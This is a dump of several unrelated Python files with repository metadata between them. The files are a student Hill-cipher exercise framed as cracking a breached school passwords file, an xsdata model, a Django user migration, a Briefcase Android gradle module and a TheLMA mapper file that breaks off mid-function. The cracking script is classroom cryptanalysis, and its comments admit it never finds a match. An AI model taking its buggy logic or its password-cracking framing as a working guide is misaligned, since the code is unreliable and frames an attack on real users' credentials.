67b989ffecd5cf7508258783b0ec26468cdf94fc
|
[
"CNRI-Python"
] | null | null | null |
#issues: it's not actually finding a match :( so the decryption matrix never gets set right :(
"""
Assignment: Instructions from Blackboard
You have breached security in the TJ syslab and acquired the passwords.txt file for the class of 2018. The format of the file is
userid encPwd
where encPwd is an encryption of their password. You know that encPwd is always between 8-12 characters, the
allowed alphabet is 61 characters long, beginning with ASC(33)=0 and ending with ASC(93)=60. You believe the passwords
have all been encrypted with a 2x2 matrix transformation (e.g. a Hill Cipher) and hope that at least one person in the
school was lazy enough to use one of the top 1,000 most common passwords (possibly padded with extra random letters).
Using your python libraries and the attached files, crack the code and determine
1) the encryption matrix
2) the userID of the person who used a common password and their password
3) the userID/password of one other person with a recognizable password (not on the top 1000 list)
handy code:
#### open a text file. read it line by line. strip the "\n" off each line. then split the line into three strings w1,w2,w3, separated by whitespace.
in = open("myFile","r")
for line in in.readlines():
line = line.strip()
(w1,w2,w3) = line.split()
in.close()
For this (improved?) version of the problem, there is a new password file to decrypt. This time you know that 3 people have
selected passwords from the common list, and that you only need to worry about passwords on the common list of length > 5.
"""
import enchant #import dictionary library
from sympy import * #our buddy sympy
from MatrixCiphers import * #helper matrix methods
from Cryptoalpha import * #helper cryptoalphabet methods
dictionary = enchant.Dict("en_US") #english library
alphabet = Cryptoalpha("!\"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]")#61 char alphabet
m = 61 #mod value
passwordsFile = open("passwords-v2.txt","r") #encrypted passwords file open
allUsersList = []
allUserPassList = []
sizedUserList = []
sizedUserPassList = []
commonPassFile = open("common-passwords.txt","r") #common passwords file open
commonPasswordList = []
decryptionMatrix = Matrix([[0,0],[0,0]]) #this is where the final matrix will be stored once we find it
sillyUser = "" #this is the user who used the commonPassword
sillyEncryptedPassword = "" #this is that user's encrypted password that's in the file
sillyPassword = "" #that person's decrypted password we were able to crack
sillyIndex = 0
hackedUser = "" #this is the user we were able to find
hackedEncryptedPassword = "" #that person's encrypted password from the file
hackedPassword = "" #that person's decrypted password
#read in all the common passwords into a list
for common in commonPassFile.readlines():
common = common.strip() #get rid of the "\n"
commonPasswordList.append(common) #add it to our list
#print(common)
#for loop going through the logins file line by line
# Known-plaintext attack on a Hill cipher: for every user whose encrypted
# password is long enough, try each common password as the candidate
# plaintext, derive a trial decryption matrix from the first four characters,
# and keep the matrix once a full decryption reproduces the common password.
# NOTE(review): assumes passwordsFile, commonPasswordList, the all*/sized*
# lists, alphabet, m, get_decryption_matrix(), decrypt(), det() and gcd()
# are all defined earlier in the script -- confirm upstream.
#for loop going through the logins file line by line
for logins in passwordsFile.readlines():
    logins = logins.strip() #get rid of the "\n"
    (userid, encpwd) = logins.split() #userid = string of username ; encpwd = encrypted password from that person
    allUsersList.append(userid) #add all the userids to a list
    allUserPassList.append(encpwd) #add all the passwords encrypted to a list
    #print(userid + " " + encpwd)
    if len(encpwd) > 5: #if the password length is more than 5
        sizedUserList.append(userid) #add the username to a separate list
        sizedUserPassList.append(encpwd) #add the password to a separate list
        #print(encpwd)
index = 0 #index of the sized user/sized password
counter = 0 #counter for number of elements
totalCombos = 0  # number of (user, common password) pairs tried so far
randomUser = 250 #we can probably make this a random number generator but for simplicity's sake, we'll just grab someone from the middle
for users in allUsersList:
    counter += 1 #yay another element has been counted
    if index < len(allUsersList): #if the index is less than the size of the list of usernames (just a bounds check)
        thisUserPassword = allUserPassList[index] #pull the password for convenience
        if len(thisUserPassword) > 5: #is it long enough for us to use?
            for commonPass in commonPasswordList:
                totalCombos += 1
                consideration = commonPass #we have our potential plaintext / the common password being considered
                #print(users + " " + thisUserPassword + " " + consideration)
                # Use a 4-character known-plaintext/ciphertext pair to solve
                # for the candidate decryption matrix.
                fourCharC = thisUserPassword[:4] #first four characters of the encrypted Password
                #print(fourCharC)
                fourCharP = consideration[:4] #first 4 characters of the possible common password
                #print(fourCharP)
                testMatrix = get_decryption_matrix(fourCharP, fourCharC , alphabet) #plaintext, ciphertext, alphabet
                #pprint(testMatrix) #print the test matrix
                #ok so test the matrix to make sure it's a good one
                if(testMatrix != None):
                    #pprint(testMatrix)
                    # A Hill decryption matrix is only valid when its
                    # determinant is coprime with the modulus m.
                    determinant = gcd(det(testMatrix), m) #use some sympy methods
                    if determinant == 1:
                        #print(determinant) #gcd is 1 = invertible matrix
                        decryptedPassword = decrypt(testMatrix, thisUserPassword, alphabet) #decrypt the password with the matrix
                        if decryptedPassword[:6] == commonPass: #if the full decrypted password matches the common password
                            #yay we have the right matrix
                            decryptionMatrix = testMatrix #save the matrix
                            sillyUser = users #save the username
                            sillyEncryptedPassword = thisUserPassword #save the encrypted password (for reference)
                            sillyPassword = decryptedPassword #save their actual password
                            sillyIndex = index #save the index
                            print("Here is one person's information:")
                            pprint(decryptionMatrix) #print stuff out
                            print(sillyUser)
                            print(sillyEncryptedPassword)
                            print(sillyPassword)
                            break #only stops the inner common-password loop; the outer user loop keeps going
    index += 1 #go to the next ones
print("Yay we're at the end of the file")
pprint(decryptionMatrix) #print stuff out
print(sillyUser)
print(sillyEncryptedPassword)
print(sillyPassword)
#cool now we should decrypt another random person's stuff (just for fun)
theOtherUser = allUsersList[randomUser] #grab their username
theOtherUserPass = allUserPassList[randomUser] #grab their encrypted password
decryptedMessage = decrypt(decryptionMatrix, theOtherUserPass, alphabet) #let's crack it using the decryption matrix from above
"""
#ideally we would check to make sure it is English, but it's possible there may be padding letters that would mess up this test
checking = dictionary.check(decryptedMessage) #is this password a real english word in the dictionary?
if checking is True: #if it passes our test
    print("The other User: " + theOtherUser) #Print stuff out
    print("Their encrypted password: " + theOtherUserPass)
    print("Their decrypted password: " + decryptedMessage)
else: #what else can we do?
    print("WRONG The other User: " + theOtherUser) #Print stuff out
    print("WRONG Their encrypted password: " + theOtherUserPass)
    print("WRONG Their decrypted password: " + decryptedMessage)
"""
print("The other User: " + theOtherUser) #Print stuff out
print("Their encrypted password: " + theOtherUserPass)
print("Their decrypted password: " + decryptedMessage)
| 51.863309
| 148
| 0.746012
|
4a07b88e142893dd3e525ab91da5a15878f25da1
| 435
|
py
|
Python
|
output/models/ms_data/datatypes/facets/g_year_month/g_year_month_pattern001_xsd/g_year_month_pattern001.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/datatypes/facets/g_year_month/g_year_month_pattern001_xsd/g_year_month_pattern001.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/datatypes/facets/g_year_month/g_year_month_pattern001_xsd/g_year_month_pattern001.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass, field
from typing import Optional
@dataclass
class FooType:
    """Schema-generated complex type carrying a single gYearMonth element."""

    class Meta:
        name = "fooType"

    # Required "foo" element, restricted to the YYYY-MM gYearMonth lexical form.
    foo: Optional[str] = field(
        default=None,
        metadata=dict(
            type="Element",
            namespace="",
            required=True,
            pattern=r"[0-9]{4}-[0-9]{2}",
        ),
    )
@dataclass
class Test(FooType):
    # Root "test" element; inherits the pattern-constrained "foo" field
    # from FooType unchanged.
    class Meta:
        name = "test"
| 17.4
| 44
| 0.51954
|
4a07b9968a1aa701265e61983f5fb36991703d21
| 1,709
|
py
|
Python
|
app/core/migrations/0001_initial.py
|
miguelcdpmarques/django-recipes-api
|
0f318809c03644d917e1aa68d8d34a3fd3b4b613
|
[
"MIT"
] | null | null | null |
app/core/migrations/0001_initial.py
|
miguelcdpmarques/django-recipes-api
|
0f318809c03644d917e1aa68d8d34a3fd3b4b613
|
[
"MIT"
] | null | null | null |
app/core/migrations/0001_initial.py
|
miguelcdpmarques/django-recipes-api
|
0f318809c03644d917e1aa68d8d34a3fd3b4b613
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.15 on 2020-04-22 17:38
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial migration: creates a custom User table with a unique email,
    # the standard auth flags, and M2M links to auth's Group/Permission.
    initial = True
    dependencies = [
        # Group/Permission tables must exist for the M2M fields below.
        ('auth', '0009_alter_user_last_name_max_length'),
    ]
    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('email', models.EmailField(max_length=255, unique=True)),
                ('name', models.CharField(max_length=255)),
                ('is_active', models.BooleanField(default=True)),
                ('is_staff', models.BooleanField(default=False)),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| 50.264706
| 266
| 0.63897
|
4a07ba6b408e0030c48f5ea193b532796ebe32da
| 9,234
|
py
|
Python
|
src/briefcase/platforms/android/gradle.py
|
pybee/briefcase
|
d7e9aa7bf15aa2abbc71e97aef9bea287129fdaa
|
[
"BSD-3-Clause"
] | 522
|
2015-07-28T16:06:18.000Z
|
2019-03-25T17:16:55.000Z
|
src/briefcase/platforms/android/gradle.py
|
pybee/briefcase
|
d7e9aa7bf15aa2abbc71e97aef9bea287129fdaa
|
[
"BSD-3-Clause"
] | 154
|
2015-09-17T02:50:55.000Z
|
2019-03-22T07:10:34.000Z
|
src/briefcase/platforms/android/gradle.py
|
pybee/briefcase
|
d7e9aa7bf15aa2abbc71e97aef9bea287129fdaa
|
[
"BSD-3-Clause"
] | 105
|
2015-09-25T08:43:26.000Z
|
2019-03-25T15:59:27.000Z
|
import re
import subprocess
from briefcase.commands import (
BuildCommand,
CreateCommand,
PackageCommand,
PublishCommand,
RunCommand,
UpdateCommand,
)
from briefcase.config import BaseConfig, parsed_version
from briefcase.exceptions import BriefcaseCommandError
from briefcase.integrations.android_sdk import AndroidSDK
def safe_formal_name(name):
    """Return *name* rewritten as a safe app name for Android.

    The characters ``/\\:<>"?*|`` can't be used in app names on Android,
    and ``!`` causes problems with the Android build tooling, so all of
    them are removed. Whitespace runs left behind (or already present)
    are collapsed to single spaces, with no leading/trailing whitespace.

    :param name: The candidate name
    :returns: The safe version of the name.
    """
    without_bad_chars = name.translate(str.maketrans("", "", '!/\\:<>"?*|'))
    # str.split() with no argument splits on any whitespace run and drops
    # empty pieces, so re-joining collapses and trims in one step.
    return " ".join(without_bad_chars.split())
class GradleMixin:
    """Shared path/tooling helpers for every gradle-backed Android command."""

    output_format = "gradle"
    platform = "android"

    @property
    def packaging_formats(self):
        # Android apps are only distributed as Android App Bundles here.
        return ["aab"]

    @property
    def default_packaging_format(self):
        return "aab"

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def bundle_path(self, app):
        """The path to the bundle for the app in the output format.

        The bundle is the template-generated source form of the app; the
        path is usually a directory whose existence indicates that the
        template has been rolled out for the app. Unlike the default
        behavior, the directory name is the Android-"safe" formal name.

        :param app: The app config
        """
        safe_name = safe_formal_name(app.formal_name)
        return self.platform_path / self.output_format / safe_name

    def binary_path(self, app):
        # Debug APK as produced by the `assembleDebug` gradle task.
        return self.bundle_path(app).joinpath(
            "app", "build", "outputs", "apk", "debug", "app-debug.apk"
        )

    def distribution_path(self, app, packaging_format):
        # Release AAB as produced by the `bundleRelease` gradle task.
        return self.bundle_path(app).joinpath(
            "app", "build", "outputs", "bundle", "release", "app-release.aab"
        )

    def gradlew_path(self, app):
        # The wrapper script ships with the rolled-out template; Windows
        # uses the batch variant.
        if self.host_os == "Windows":
            wrapper = "gradlew.bat"
        else:
            wrapper = "gradlew"
        return self.bundle_path(app) / wrapper

    def verify_tools(self):
        """Verify that the Android APK tools will operate on this system,
        downloading tools as needed."""
        super().verify_tools()
        self.android_sdk = AndroidSDK.verify(self)
class GradleCreateCommand(GradleMixin, CreateCommand):
    """Rolls out and populates the gradle template for an app."""

    description = "Create and populate an Android APK."

    def output_format_template_context(self, app: BaseConfig):
        """Additional template context required by the output format.

        :param app: The config object for the app
        :returns: dict with the derived ``version_code`` and the
            Android-safe formal name.
        """
        # Android requires an integer "version code". An explicit
        # `version_code` on the app config wins; otherwise derive one from
        # the version number, appending the build number if provided.
        try:
            version_code = app.version_code
        except AttributeError:
            parsed = parsed_version(app.version)
            # Pad the release tuple out to exactly (major, minor, micro).
            major, minor, micro = (list(parsed.release) + [0, 0])[:3]
            build = int(getattr(app, "build", "0"))
            version_code = "{:d}{:02d}{:02d}{:02d}".format(
                major, minor, micro, build
            ).lstrip("0")
        return {
            "version_code": version_code,
            "safe_formal_name": safe_formal_name(app.formal_name),
        }
class GradleUpdateCommand(GradleMixin, UpdateCommand):
    # No gradle-specific behaviour: inherits the generic update logic plus
    # the GradleMixin path helpers.
    description = "Update an existing Android debug APK."
class GradleBuildCommand(GradleMixin, BuildCommand):
    """Builds the debug APK by running gradle's ``assembleDebug`` task."""

    description = "Build an Android debug APK."

    def build_app(self, app: BaseConfig, **kwargs):
        """Build an application.

        :param app: The application to build
        :raises BriefcaseCommandError: if the gradle invocation fails.
        """
        self.logger.info("Building Android APK...", prefix=app.app_name)
        # Windows needs the full path to `gradlew`; macOS & Linux can find
        # it via `./gradlew`. For simplicity of implementation, we always
        # provide the full path. The working directory is the app bundle
        # path so gradle uses it as the project root (otherwise it fails
        # with 'Task assembleDebug not found').
        gradle_cmd = [self.gradlew_path(app), "assembleDebug"]
        try:
            self.subprocess.run(
                gradle_cmd,
                env=self.android_sdk.env,
                cwd=self.bundle_path(app),
                check=True,
            )
        except subprocess.CalledProcessError as e:
            raise BriefcaseCommandError("Error while building project.") from e
class GradleRunCommand(GradleMixin, RunCommand):
    description = "Run an Android debug APK on a device (physical or virtual)."

    def verify_tools(self):
        # Beyond the base SDK checks, make sure an emulator is available so
        # a run without an attached device can still proceed.
        super().verify_tools()
        self.android_sdk.verify_emulator()

    def add_options(self, parser):
        # Adds the device/AVD selection option on top of the base options.
        super().add_options(parser)
        parser.add_argument(
            "-d",
            "--device",
            dest="device_or_avd",
            help="The device to target; either a device ID for a physical device, "
            " or an AVD name ('@emulatorName') ",
            required=False,
        )

    def run_app(self, app: BaseConfig, device_or_avd=None, **kwargs):
        """Start the application.

        :param app: The config object for the app
        :param device_or_avd: The device to target. If ``None``, the user will
            be asked to re-run the command selecting a specific device.
        """
        device, name, avd = self.android_sdk.select_target_device(
            device_or_avd=device_or_avd
        )
        # If there's no device ID, that means the emulator isn't running.
        # If there's no AVD either, it means the user has chosen to create
        # an entirely new emulator. Create the emulator (if necessary),
        # then start it.
        if device is None:
            if avd is None:
                avd = self.android_sdk.create_emulator()
            device, name = self.android_sdk.start_emulator(avd)
        self.logger.info()
        self.logger.info(
            f"Starting app on {name} (device ID {device})", prefix=app.app_name
        )
        # Create an ADB wrapper for the selected device
        adb = self.android_sdk.adb(device=device)
        # Compute Android package name. The Android template uses
        # `package_name` and `module_name`, so we use those here as well.
        package = f"{app.package_name}.{app.module_name}"
        # We force-stop the app to ensure the activity launches freshly.
        self.logger.info()
        self.logger.info("Stopping old versions of the app...", prefix=app.app_name)
        adb.force_stop_app(package)
        # Install the latest APK file onto the device.
        self.logger.info()
        self.logger.info("Installing app...", prefix=app.app_name)
        adb.install_apk(self.binary_path(app))
        self.logger.info()
        self.logger.info("Clearing device log...", prefix=app.app_name)
        adb.clear_log()
        # To start the app, we launch `org.beeware.android.MainActivity`.
        self.logger.info()
        self.logger.info("Launching app...", prefix=app.app_name)
        adb.start_app(package, "org.beeware.android.MainActivity")
        # Stream the device log until the user interrupts; this call blocks.
        self.logger.info()
        self.logger.info(
            "Following device log output (type CTRL-C to stop log)...",
            prefix=app.app_name,
        )
        self.logger.info("=" * 75)
        adb.logcat()
class GradlePackageCommand(GradleMixin, PackageCommand):
    """Builds the release artefacts via gradle's ``bundleRelease`` task."""

    description = "Create an Android App Bundle and APK in release mode."

    def package_app(self, app: BaseConfig, **kwargs):
        """Package the app for distribution.

        This involves building the release app bundle.

        :param app: The application to build
        :raises BriefcaseCommandError: if the gradle invocation fails.
        """
        self.logger.info(
            "Building Android App Bundle and APK in release mode...",
            prefix=app.app_name,
        )
        # Windows needs the full path to `gradlew`; macOS & Linux can find
        # it via `./gradlew`. For simplicity of implementation, we always
        # provide the full path. Running from the bundle path makes gradle
        # treat it as the project root (otherwise it fails with 'Task
        # bundleRelease not found').
        release_cmd = [self.gradlew_path(app), "bundleRelease"]
        try:
            self.subprocess.run(
                release_cmd,
                env=self.android_sdk.env,
                cwd=self.bundle_path(app),
                check=True,
            )
        except subprocess.CalledProcessError as e:
            raise BriefcaseCommandError("Error while building project.") from e
class GradlePublishCommand(GradleMixin, PublishCommand):
    # No gradle-specific publish behaviour; inherits everything from
    # PublishCommand plus the GradleMixin path helpers.
    description = "Publish an Android APK."
# Declare the briefcase command bindings
create = GradleCreateCommand  # noqa
update = GradleUpdateCommand  # noqa
build = GradleBuildCommand  # noqa
run = GradleRunCommand  # noqa
package = GradlePackageCommand  # noqa
publish = GradlePublishCommand  # noqa
| 34.327138
| 87
| 0.615551
|
4a07bb353a629c0e2742aa7f35c3e16a7ab45b57
| 19,549
|
py
|
Python
|
thelma/repositories/rdb/mappers/__init__.py
|
fogathmann/TheLMA
|
ac330a0005da4fea2f1387da9ff9938611ad1481
|
[
"MIT"
] | 1
|
2020-07-12T22:47:58.000Z
|
2020-07-12T22:47:58.000Z
|
thelma/repositories/rdb/mappers/__init__.py
|
papagr/TheLMA
|
d2dc7a478ee5d24ccf3cc680888e712d482321d0
|
[
"MIT"
] | null | null | null |
thelma/repositories/rdb/mappers/__init__.py
|
papagr/TheLMA
|
d2dc7a478ee5d24ccf3cc680888e712d482321d0
|
[
"MIT"
] | 1
|
2020-07-12T22:40:36.000Z
|
2020-07-12T22:40:36.000Z
|
from thelma.repositories.rdb.mappers import amplicondesign
from thelma.repositories.rdb.mappers import antimirdesign
from thelma.repositories.rdb.mappers import barcodedlocation
from thelma.repositories.rdb.mappers import barcodedlocationrack
from thelma.repositories.rdb.mappers import barcodedlocationtype
from thelma.repositories.rdb.mappers import chemicalstructure
from thelma.repositories.rdb.mappers import cloneddsdnadesign
from thelma.repositories.rdb.mappers import compoundchemicalstructure
from thelma.repositories.rdb.mappers import compounddesign
from thelma.repositories.rdb.mappers import container
from thelma.repositories.rdb.mappers import tubelocation
from thelma.repositories.rdb.mappers import containerspecs
from thelma.repositories.rdb.mappers import device
from thelma.repositories.rdb.mappers import devicetype
from thelma.repositories.rdb.mappers import esirnadesign
from thelma.repositories.rdb.mappers import executedliquidtransfer
from thelma.repositories.rdb.mappers import executedracksampletransfer
from thelma.repositories.rdb.mappers import executedsampledilution
from thelma.repositories.rdb.mappers import executedsampletransfer
from thelma.repositories.rdb.mappers import executedworklist
from thelma.repositories.rdb.mappers import experiment
from thelma.repositories.rdb.mappers import experimentdesign
from thelma.repositories.rdb.mappers import experimentdesignrack
from thelma.repositories.rdb.mappers import experimentjob
from thelma.repositories.rdb.mappers import experimentmetadata
from thelma.repositories.rdb.mappers import experimentmetadatatype
from thelma.repositories.rdb.mappers import experimentrack
from thelma.repositories.rdb.mappers import gene
from thelma.repositories.rdb.mappers import iso
from thelma.repositories.rdb.mappers import isoaliquotplate
from thelma.repositories.rdb.mappers import isojob
from thelma.repositories.rdb.mappers import isojobpreparationplate
from thelma.repositories.rdb.mappers import isojobstockrack
from thelma.repositories.rdb.mappers import isoplate
from thelma.repositories.rdb.mappers import isopreparationplate
from thelma.repositories.rdb.mappers import isorequest
from thelma.repositories.rdb.mappers import isosectorpreparationplate
from thelma.repositories.rdb.mappers import isosectorstockrack
from thelma.repositories.rdb.mappers import isostockrack
from thelma.repositories.rdb.mappers import itemstatus
from thelma.repositories.rdb.mappers import job
from thelma.repositories.rdb.mappers import labiso
from thelma.repositories.rdb.mappers import labisorequest
from thelma.repositories.rdb.mappers import libraryplate
from thelma.repositories.rdb.mappers import longdsrnadesign
from thelma.repositories.rdb.mappers import mirnainhibitordesign
from thelma.repositories.rdb.mappers import mirnamimicdesign
from thelma.repositories.rdb.mappers import modificationchemicalstructure
from thelma.repositories.rdb.mappers import molecule
from thelma.repositories.rdb.mappers import moleculedesign
from thelma.repositories.rdb.mappers import moleculedesignlibrary
from thelma.repositories.rdb.mappers import moleculedesignpool
from thelma.repositories.rdb.mappers import moleculedesignpoolset
from thelma.repositories.rdb.mappers import moleculedesignsetbase
from thelma.repositories.rdb.mappers import moleculetype
from thelma.repositories.rdb.mappers import nucleicacidchemicalstructure
from thelma.repositories.rdb.mappers import organization
from thelma.repositories.rdb.mappers import pipettingspecs
from thelma.repositories.rdb.mappers import plannedliquidtransfer
from thelma.repositories.rdb.mappers import plannedracksampletransfer
from thelma.repositories.rdb.mappers import plannedsampledilution
from thelma.repositories.rdb.mappers import plannedsampletransfer
from thelma.repositories.rdb.mappers import plannedworklist
from thelma.repositories.rdb.mappers import plate
from thelma.repositories.rdb.mappers import platespecs
from thelma.repositories.rdb.mappers import primerdesign
from thelma.repositories.rdb.mappers import project
from thelma.repositories.rdb.mappers import rack
from thelma.repositories.rdb.mappers import racklayout
from thelma.repositories.rdb.mappers import rackposition
from thelma.repositories.rdb.mappers import rackpositionset
from thelma.repositories.rdb.mappers import rackshape
from thelma.repositories.rdb.mappers import rackspecs
from thelma.repositories.rdb.mappers import reservoirspecs
from thelma.repositories.rdb.mappers import samplemolecule
from thelma.repositories.rdb.mappers import sampleregistration
from thelma.repositories.rdb.mappers import sirnadesign
from thelma.repositories.rdb.mappers import species
from thelma.repositories.rdb.mappers import moleculedesignset
from thelma.repositories.rdb.mappers import stockinfo
from thelma.repositories.rdb.mappers import stockrack
from thelma.repositories.rdb.mappers import stocksample
from thelma.repositories.rdb.mappers import stocksamplecreationiso
from thelma.repositories.rdb.mappers import stocksamplecreationisorequest
from thelma.repositories.rdb.mappers import subproject
from thelma.repositories.rdb.mappers import suppliermoleculedesign
from thelma.repositories.rdb.mappers import supplierstructureannotation
from thelma.repositories.rdb.mappers import tag
from thelma.repositories.rdb.mappers import tagged
from thelma.repositories.rdb.mappers import taggedrackpositionset
from thelma.repositories.rdb.mappers import tagging
from thelma.repositories.rdb.mappers import tube
from thelma.repositories.rdb.mappers import tuberack
from thelma.repositories.rdb.mappers import tuberackspecs
from thelma.repositories.rdb.mappers import tubespecs
from thelma.repositories.rdb.mappers import tubetransfer
from thelma.repositories.rdb.mappers import tubetransferworklist
from thelma.repositories.rdb.mappers import unknownchemicalstructure
from thelma.repositories.rdb.mappers import user
from thelma.repositories.rdb.mappers import userpreferences
from thelma.repositories.rdb.mappers import well
from thelma.repositories.rdb.mappers import wellspecs
from thelma.repositories.rdb.mappers import worklistseries
from thelma.repositories.rdb.mappers import worklistseriesmember
from thelma.repositories.rdb.mappers import sample
def initialize_mappers(tables, views):
    """Wire up every SQLAlchemy mapper against the supplied metadata.

    :param tables: mapping of table name -> SQLAlchemy table object.
    :param views: mapping of view name -> selectable for the DB views used
        by the molecule-type and stock-info mappers.

    NOTE(review): ordering matters -- several ``create_mapper`` calls return
    a base mapper that later (inheriting) mappers extend, so the call
    sequence must not be reordered casually.
    """
    # --- organizations, statuses, container/rack hierarchy -----------------
    organization.create_mapper(tables['organization'])
    itemstatus.create_mapper(tables['item_status'])
    containerspecs_mapper = \
        containerspecs.create_mapper(tables['container_specs'])
    tubespecs.create_mapper(containerspecs_mapper,
                            tables['rack_specs_container_specs'])
    wellspecs.create_mapper(containerspecs_mapper,
                            tables['rack_specs_container_specs'])
    container_mapper = container.create_mapper(tables['container'])
    tube.create_mapper(container_mapper, tables['tube'])
    well.create_mapper(container_mapper, tables['well'])
    rack_mapper = rack.create_mapper(tables['rack'],
                                     tables['rack_barcoded_location'])
    tuberack.create_mapper(rack_mapper, tables['tube_rack'],
                           tables['tube_location'])
    plate.create_mapper(rack_mapper, tables['plate'])
    tubelocation.create_mapper(tables['tube_location'])
    rackshape.create_mapper(tables['rack_shape'])
    rackspecs_mapper = rackspecs.create_mapper(tables['rack_specs'])
    tuberackspecs.create_mapper(rackspecs_mapper,
                                tables['rack_specs_container_specs'])
    platespecs.create_mapper(rackspecs_mapper,
                             tables['rack_specs_container_specs'])
    devicetype.create_mapper(tables['device_type'])
    device.create_mapper(tables['device'])
    barcodedlocation.create_mapper(tables['barcoded_location'],
                                   tables['rack_barcoded_location'])
    barcodedlocationrack.create_mapper(tables['rack_barcoded_location'])
    barcodedlocationtype.create_mapper(tables['barcoded_location'])
    # --- molecules, samples, genes -----------------------------------------
    moleculetype.create_mapper(tables['molecule_type'],
                               views['molecule_type_modification_view'],
                               tables['chemical_structure'])
    samplemolecule.create_mapper(tables['sample_molecule'])
    molecule.create_mapper(tables['molecule'],
                           tables['molecule_supplier_molecule_design'])
    sample_mapper = sample.create_mapper(tables['sample'],
        tables['sample_molecule'], tables['molecule'],
        tables['molecule_design_pool'])
    sampleregistration.create_mapper(tables['sample_registration'])
    gene.create_mapper(tables['refseq_gene'],
                       tables['molecule_design_gene'],
                       tables['molecule_design_set_gene'],
                       tables['molecule_design'],
                       tables['molecule_design_pool'])
    species.create_mapper(tables['species'])
    stockinfo.create_mapper(views['stock_info_view'],
                            tables['molecule_design_set'],
                            tables['molecule_design_set_gene'],
                            tables['refseq_gene'])
    # --- chemical structures (base mapper + inheriting variants) -----------
    chemical_structure_mapper = \
        chemicalstructure.create_mapper(tables['chemical_structure'],
                                        tables['molecule_design_structure'])
    compoundchemicalstructure.create_mapper(chemical_structure_mapper,
                                            tables['chemical_structure'])
    nucleicacidchemicalstructure.create_mapper(chemical_structure_mapper,
                                               tables['chemical_structure'])
    modificationchemicalstructure.create_mapper(chemical_structure_mapper,
                                                tables['chemical_structure'])
    unknownchemicalstructure.create_mapper(chemical_structure_mapper,
                                           tables['chemical_structure'])
    # --- molecule designs, design sets and pools ---------------------------
    molecule_design_mapper = \
        moleculedesign.create_mapper(tables['molecule_design'],
                                     tables['molecule_design_structure'],
                                     tables['single_supplier_molecule_design'],
                                     tables['molecule_design_gene'],
                                     tables['refseq_gene'])
    molecule_design_set_mapper = \
        moleculedesignsetbase.create_mapper(tables['molecule_design_set'],
                                            tables['molecule_design_set_member'])
    moleculedesignlibrary.create_mapper(tables['molecule_design_library'],
        tables['stock_sample_creation_iso_request'],
        tables['molecule_design_library_creation_iso_request'])
    libraryplate.create_mapper(tables['library_plate'],
                               tables['lab_iso_library_plate'])
    moleculedesignset.create_mapper(
        molecule_design_set_mapper)
    moleculedesignpool.create_mapper(
        molecule_design_set_mapper,
        tables['molecule_design_pool'],
        tables['pooled_supplier_molecule_design'],
        tables['supplier_molecule_design'],
        tables['molecule_design_set_gene'])
    stocksample.create_mapper(sample_mapper, tables['stock_sample'],
                              tables['pooled_supplier_molecule_design'],
                              tables['supplier_molecule_design'])
    moleculedesignpoolset.create_mapper(
        tables['molecule_design_pool_set'],
        tables['molecule_design_pool_set_member'],
        )
    # Design subtypes all extend the molecule design base mapper.
    compounddesign.create_mapper(molecule_design_mapper,
                                 tables['molecule_design'])
    antimirdesign.create_mapper(molecule_design_mapper,
                                tables['molecule_design'])
    cloneddsdnadesign.create_mapper(molecule_design_mapper,
                                    tables['molecule_design'])
    esirnadesign.create_mapper(molecule_design_mapper,
                               tables['molecule_design'])
    longdsrnadesign.create_mapper(molecule_design_mapper,
                                  tables['molecule_design'])
    primerdesign.create_mapper(molecule_design_mapper,
                               tables['molecule_design'])
    amplicondesign.create_mapper(molecule_design_mapper,
                                 tables['molecule_design'])
    sirnadesign.create_mapper(molecule_design_mapper,
                              tables['molecule_design'])
    mirnainhibitordesign.create_mapper(molecule_design_mapper,
                                       tables['molecule_design'])
    mirnamimicdesign.create_mapper(molecule_design_mapper,
                                   tables['molecule_design'])
    suppliermoleculedesign.create_mapper(
        tables['supplier_molecule_design'],
        tables['single_supplier_molecule_design'],
        tables['pooled_supplier_molecule_design'])
    supplierstructureannotation.create_mapper(
        tables['supplier_structure_annotation'])
    # --- tagging and rack layouts ------------------------------------------
    tagging.create_mapper(tables['tagging'])
    tag.create_mapper(tables['tag'], tables['tag_domain'],
                      tables['tag_predicate'], tables['tag_value'],
                      tables['tagging'])
    tagged_mapper = tagged.create_mapper(tables['tagged'], tables['tagging'])
    taggedrackpositionset.create_mapper(tagged_mapper,
                                        tables['tagged_rack_position_set'])
    rackpositionset.create_mapper(tables['rack_position_set'],
                                  tables['rack_position_set_member'])
    rackposition.create_mapper(tables['rack_position'])
    racklayout.create_mapper(tables['rack_layout'])
    # --- jobs and experiments ----------------------------------------------
    job_mapper = job.create_mapper(tables['new_job'])
    # FIXME: pylint: disable=W0511
    # Need to get rid of the "new_" prefix.
    experiment.create_mapper(tables['new_experiment'],
                             tables['experiment_source_rack'])
    experimentdesignrack.create_mapper(tables['experiment_design_rack'],
        tables['worklist_series_experiment_design_rack'])
    experimentdesign.create_mapper(tables['experiment_design'],
                                   tables['worklist_series_experiment_design'])
    experimentrack.create_mapper(tables['new_experiment_rack'])
